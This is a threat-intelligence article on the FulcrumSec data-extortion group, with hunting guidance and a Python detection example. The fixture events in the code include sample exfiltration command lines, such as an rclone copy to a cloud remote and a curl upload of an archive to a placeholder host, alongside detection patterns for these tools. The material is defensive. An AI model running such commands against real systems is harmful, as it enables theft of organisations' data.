New Threat Actor: FulcrumSec

As of late October 2025, FulcrumSec is considered a newly emerged threat. Specific technical indicators (such as file hashes or C2 IP addresses) are not yet available. This article focuses on their confirmed activity and provides actionable hunting guidance based on the TTPs of similar data extortion groups.

Threat Actor Profile: FulcrumSec

  • Actor Type: Organized Crime (Data Extortion Group)
  • Emerged: September 2025
  • Motive: Financial (Profit-oriented, seeks to sell exfiltrated data to a single buyer).
  • Modus Operandi: FulcrumSec is a “data extortion-only” group. They do not deploy ransomware. Their model relies on:
    1. Breaching a high-value target.
    2. Conducting large-scale data exfiltration.
    3. Using a dual-platform leak site (clearnet and dark web) and a Telegram channel to extort the victim and attract a buyer.
    4. Selling the data to a single party rather than leaking it publicly, a stated intent and a tactic designed to maximize the data’s value.

Victimology

  • Confirmed Victims: One.
  • Victim: Avnet (U.S.-based, Fortune 500)
  • Victim Scale: Avnet is a global distributor of electronic components with a reported revenue of $22 billion. The successful breach of an enterprise of this size indicates a high level of technical proficiency.
  • Impact: FulcrumSec claims to have exfiltrated 1.3 TB of compressed data, including operational data, customer information, and point-of-sale records.

Tactics, Techniques, and Procedures (TTPs) & SOC Hunting Guidance

Specific TTPs for FulcrumSec’s initial access at Avnet have not been publicly disclosed. However, their profile as a “data extortion-only” group is similar to actors like LAPSUS$ and Karakurt. SOCs should hunt for TTPs common to these groups.

1. TTP: Initial Access

Actors like LAPSUS$ have proven that social engineering and identity-based attacks are highly effective. Focus detection on the “human layer.”

  • Social Engineering (Vishing/Phishing): The actor may target IT help desks or new employees to gain credentials, reset passwords, or bypass Multi-Factor Authentication (MFA).
    • Hunt Guidance: Monitor for unusual MFA push notifications (MFA fatigue), suspicious password reset requests from help desk staff, and employees reporting vishing calls.
  • Credential Compromise: The actor likely uses credentials purchased from initial access brokers (IABs) or harvested from infostealer malware logs.
    • Hunt Guidance: Monitor for logins from non-corporate VPNs, unusual geolocations, or logins with user agents tied to infostealer malware.
  • Third-Party/Supply Chain Attack: The actor may target a trusted third-party vendor or contractor who has privileged access to the target network.
    • Hunt Guidance: Strictly audit and monitor all third-party and vendor accounts. Look for activity that deviates from their normal baseline, such as accessing systems or data outside their typical job function.

2. TTP: Data Staging & Exfiltration

To exfiltrate 1.3 TB of data, the actor must use tools capable of large-scale file transfers. These are often legitimate “Living off the Land” (LotL) binaries that blend in with normal administrative traffic.

  • Data Staging: Before exfiltration, threat actors compress and consolidate data.
    • Hunt Guidance: Monitor process-creation events and their command-line arguments for archival tools such as 7z.exe or WinRAR.exe. Look for the creation of large archives (.zip, .rar, .7z) in unusual directories (e.g., C:\temp\, C:\ProgramData\).
  • Data Exfiltration: This is the key TTP. The actor uses common file transfer and cloud synchronization tools.
    • Hunt Guidance:
      • Rclone: This is the most common tool used by threat actors for mass data exfiltration. Monitor for rclone.exe on endpoints and associated command-line arguments (e.g., rclone copy, rclone sync). Block network traffic to known Rclone destinations (e.g., Mega, Google Drive, Amazon S3) from any server or endpoint that does not have an explicit business need.
      • FileZilla / WinSCP: Monitor for the presence or execution of fzsftp.exe (FileZilla) or WinSCP.exe and any outbound SFTP/FTP traffic to unknown IP addresses.
      • cURL: Monitor for curl.exe (native in Windows) used to upload data via POST requests to unknown domains.
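The staging and exfiltration hunts above, written as detection logic that runs over process-creation telemetry. This is an added example, not code from the original article: the records are constructed Sysmon Event ID 1-style dictionaries, and the host names, paths and the `mega:` remote name are assumptions.

```python
import re
from collections import defaultdict

# Constructed Sysmon Event ID 1 (process creation) records for illustration; not real telemetry.
SAMPLE_EVENTS = [
    {"Host": "FS01", "Image": r"C:\Program Files\7-Zip\7z.exe",
     "CommandLine": r"7z.exe a -mx1 C:\ProgramData\backup.7z D:\Shares\Finance"},
    {"Host": "FS01", "Image": r"C:\Users\svc_bkp\AppData\Local\rclone.exe",
     "CommandLine": r"rclone.exe copy C:\ProgramData\backup.7z mega:drop --transfers 8"},
    {"Host": "WS22", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -X POST -F file=@C:\temp\q3.zip https://upload.example.invalid/u"},
    {"Host": "WS22", "Image": r"C:\Program Files\WinSCP\WinSCP.exe", "CommandLine": "WinSCP.exe"},
    {"Host": "WS10", "Image": r"C:\Windows\System32\curl.exe",  # benign download: no upload flags
     "CommandLine": "curl.exe -sL https://download.example.invalid/tool.msi -o tool.msi"},
    {"Host": "WS10", "Image": r"C:\Program Files\7-Zip\7z.exe",  # benign extract outside staging dirs
     "CommandLine": r"7z.exe x C:\Users\alice\Downloads\report.zip"},
]

ARCHIVERS, SFTP_CLIENTS = {"7z.exe", "winrar.exe", "rar.exe"}, {"winscp.exe", "fzsftp.exe"}
STAGING_DIRS = ("c:\\temp\\", "c:\\programdata\\")
ARCHIVE_PATH = re.compile(r'[a-z]:\\[^"\s]+\.(?:zip|rar|7z)\b')
RCLONE_XFER = re.compile(r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b")
CURL_UPLOAD = re.compile(r"\s(?:-x\s+post|-d|--data\S*|-f|--form|-t|--upload-file)\s")

def classify(event):
    """Return the hunt tags one process-creation event triggers (empty list if none)."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"].lower()
    tags = []
    # Archiver writing a .zip/.rar/.7z into a known staging directory
    if image in ARCHIVERS and any(p.startswith(STAGING_DIRS) for p in ARCHIVE_PATH.findall(cmd)):
        tags.append("staging:archive_in_staging_dir")
    if image == "rclone.exe" and RCLONE_XFER.search(cmd):
        tags.append("exfil:rclone_transfer")
    if image in SFTP_CLIENTS:
        tags.append("exfil:sftp_client_executed")
    # curl with a body/upload flag (POST, -d/--data, -F/--form, -T/--upload-file); plain downloads pass
    if image == "curl.exe" and CURL_UPLOAD.search(f" {cmd} "):
        tags.append("exfil:curl_upload")
    return tags

def hunt(events):
    """Keep only events that fired at least one tag."""
    return [{"Host": e["Host"], "Image": e["Image"], "Tags": t} for e in events if (t := classify(e))]

def hosts_staging_and_exfil(events):
    """Hosts showing both staging and a transfer tool: the highest-priority leads."""
    seen = defaultdict(set)
    for e in events:
        for t in classify(e):
            seen[e["Host"]].add(t.split(":")[0])
    return sorted(h for h, kinds in seen.items() if {"staging", "exfil"} <= kinds)
```

Tune `STAGING_DIRS` and the tool sets to your environment's baseline before deploying; the correlation function is what separates a lone archiver run from a staging-plus-transfer sequence worth escalating.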

Indicators of Compromise (IOCs)

Due to the newness of this actor, the only publicly known IOCs are related to their extortion infrastructure.

  • Domain: fulcrumsec.net (FulcrumSec’s clearnet data leak site)
  • Actor Name: FulcrumSec

SOC Recommendations

  1. Block the domain fulcrumsec.net at the firewall and web proxy.
  2. Monitor DNS logs for any internal clients attempting to resolve this domain.
  3. Add the string “FulcrumSec” to threat intelligence monitoring and log-scraping queries.
  4. Prioritize Hunting: Focus on the “Data Staging & Exfiltration” TTPs listed above. Detecting the anomalous use of rclone.exe or other transfer tools is the most likely way to catch a breach from this actor (or a copycat) in progress.